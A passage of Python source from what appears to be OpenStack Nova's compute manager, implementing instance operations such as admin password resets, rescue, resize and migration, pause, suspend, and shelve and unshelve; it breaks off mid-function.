@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info(_LI("Root password set"), instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning(_LW('set_admin_password is not implemented '
'by this driver or guest instance.'),
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception(_LE('set_admin_password failed'),
instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
            LOG.warning(_LW('trying to inject a file into a non-running '
                            'instance: (state: %(current_state)s expected: '
                            '%(expected_state)s)'),
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
        LOG.info(_LI('injecting file into %s'), path,
instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning(_LW('Unable to find a different image to use for '
'rescue VM, using instance\'s current image'),
instance=instance)
rescue_image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(context, self.image_api,
rescue_image_ref,
instance)
# NOTE(belliott) bug #1227350 - xenapi needs the actual image id
image_meta['id'] = rescue_image_ref
return image_meta
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref=None, clean_shutdown=True):
context = context.elevated()
LOG.info(_LI('Rescuing'), context=context, instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self._get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
rescue_image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception(_LE("Error trying to Rescue Instance"),
instance=instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info(_LI('Unrescuing'), context=context, instance=instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
def _cleanup_stored_instance_types(self, instance, restore_old=False):
"""Clean up "old" and "new" instance_type information stored in
instance's system_metadata. Optionally update the "current"
instance_type to the saved old one first.
Returns the updated system_metadata as a dict, the
post-cleanup current instance type and the to-be dropped
instance type.
"""
sys_meta = instance.system_metadata
if restore_old:
instance_type = instance.get_flavor('old')
drop_instance_type = instance.get_flavor()
instance.set_flavor(instance_type)
else:
instance_type = instance.get_flavor()
drop_instance_type = instance.get_flavor('old')
instance.delete_flavor('old')
instance.delete_flavor('new')
return sys_meta, instance_type, drop_instance_type
@wrap_exception()
@wrap_instance_event
@wrap_instance_fault
def confirm_resize(self, context, instance, reservations, migration):
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
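        # The real work happens in a nested function so it can be serialized
        # per instance via utils.synchronized, preventing two confirmations
        # of the same resize from racing each other.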
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
context=context, instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error(_LE("Migration %s is not found during confirmation"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
if migration.status == 'confirmed':
LOG.info(_LI("Migration %s is already confirmed"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning(_LW("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation "
"process"),
{"status": migration.status, "id": migration_id},
context=context, instance=instance)
quotas.rollback()
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info(_LI("Instance is not found during confirmation"),
context=context, instance=instance)
quotas.rollback()
return
self._confirm_resize(context, instance, quotas,
migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, quotas,
migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(danms): delete stashed migration information
sys_meta, instance_type, old_instance_type = (
self._cleanup_stored_instance_types(instance))
sys_meta.pop('old_vm_state', None)
instance.system_metadata = sys_meta
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self._get_instance_nw_info(context, instance)
self.driver.confirm_migration(migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(migration.source_node)
rt.drop_resize_claim(context, instance, old_instance_type)
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
quotas.commit()
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration, reservations):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
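            # Only destroy local disks if the instance's storage is not
            # shared with the source host; otherwise we would wipe data the
            # source still needs.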
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(instance.node)
rt.drop_resize_claim(context, instance)
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute,
quotas.reservations)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, reservations, migration):
"""Finishes the second half of reverting a resize.
Bring the original source instance state back (active/shutoff) and
revert the resized attributes in the database.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
sys_meta, instance_type, drop_instance_type = (
self._cleanup_stored_instance_types(instance, True))
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = sys_meta.pop('old_vm_state', vm_states.ACTIVE)
instance.system_metadata = sys_meta
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.instance_type_id = instance_type['id']
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
migration.dest_compute = migration.source_compute
with migration.obj_as_admin():
migration.save()
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
power_on = old_vm_state != vm_states.STOPPED
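            # Only power the instance back on if it was running before the
            # resize started; a previously stopped instance is left off.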
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info(_LI("Updating instance to original state: '%s'"),
old_vm_state)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
quotas.commit()
def _prep_resize(self, context, image, instance, instance_type,
quotas, request_spec, filter_properties, node,
clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
if same_host and not CONF.allow_resize_to_same_host:
self._set_instance_error_state(context, instance)
msg = _('destination same as source!')
raise exception.MigrationError(reason=msg)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.set_flavor(instance_type, 'new')
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker(node)
with rt.resize_claim(context, instance, instance_type,
image_meta=image, limits=limits) as claim:
LOG.info(_LI('Migrating'), context=context, instance=instance)
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, quotas.reservations,
clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown=True):
"""Initiates the process of moving a running instance to another host.
Possibly changes the RAM and disk size in the process.
"""
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
try:
self._prep_resize(context, image, instance,
instance_type, quotas,
request_spec, filter_properties,
node, clean_shutdown)
# NOTE(dgenin): This is thrown in LibvirtDriver when the
# instance to be migrated is backed by LVM.
# Remove when LVM migration is implemented.
except exception.MigrationPreCheckError:
raise
except Exception:
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, quotas, request_spec,
filter_properties)
finally:
extra_usage_info = dict(
new_instance_type=instance_type['name'],
new_instance_type_id=instance_type['id'])
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, quotas, request_spec, filter_properties):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type,
quotas.reservations)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info)
except Exception as error:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
else:
# not re-scheduling
raise exc_info[0], exc_info[1], exc_info[2]
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def resize_instance(self, context, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
"""Starts the migration of a running instance to another host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
network_info = self._get_instance_nw_info(context, instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
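            # migrate_disk_and_power_off shuts the guest down and prepares/
            # transfers its disks for the destination host, returning
            # driver-specific disk info that finish_resize will consume.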
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info,
migration.dest_compute, reservations=quotas.reservations)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
self.volume_api.terminate_connection(context, bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type['id']
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.set_flavor(instance_type)
def _finish_resize(self, context, instance, migration, disk_info,
image):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.set_flavor(old_instance_type, 'old')
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
resize_instance = True
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if resize_instance:
self._set_instance_info(instance,
old_instance_type)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
reservations, migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._finish_resize(context, instance, migration,
disk_info, image)
quotas.commit()
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
with excutils.save_and_reraise_exception():
try:
quotas.rollback()
except Exception:
LOG.exception(_LE("Failed to rollback quota for failed "
"finish_resize"),
instance=instance)
self._set_instance_error_state(context, instance)
@object_compat
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info(_LI('Pausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info(_LI('Unpausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
diags = self.driver.get_instance_diagnostics(instance)
return diags.serialize()
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info(_LI('Resuming'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(
context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown=True):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
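        # The driver reports snapshot progress via the generic IMAGE_* task
        # states; map them onto the shelve-specific states so a shelve can
        # be told apart from a plain snapshot.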
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.strtime()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
if CONF.shelved_offload_time == 0:
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown=True):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
        volume-backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.destroy(context, instance, network_info,
block_device_info)
instance.power_state = current_power_state
instance.host = None
instance.node = None
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties=None, node=None):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
        :param image: an image to build from. If None we assume a
            volume-backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
self._notify_about_instance_usage(context, instance, 'unshelve.start')
instance.task_state = task_states.SPAWNING
instance.save()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._prep_block_device(context, instance, bdms,
do_check_attach=False)
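        # NOTE: do_check_attach is skipped here, presumably because the
        # volumes were already attached (and still show as in-use in Cinder)
        # before the instance was shelved.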
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self.driver.get_available_nodes()[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
rt = self._get_resource_tracker(node)
limits = filter_properties.get('limits', {})
if image:
shelved_image_ref = instance.image_ref
instance.image_ref = image['id']
image_meta = image
else:
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self._get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, limits):
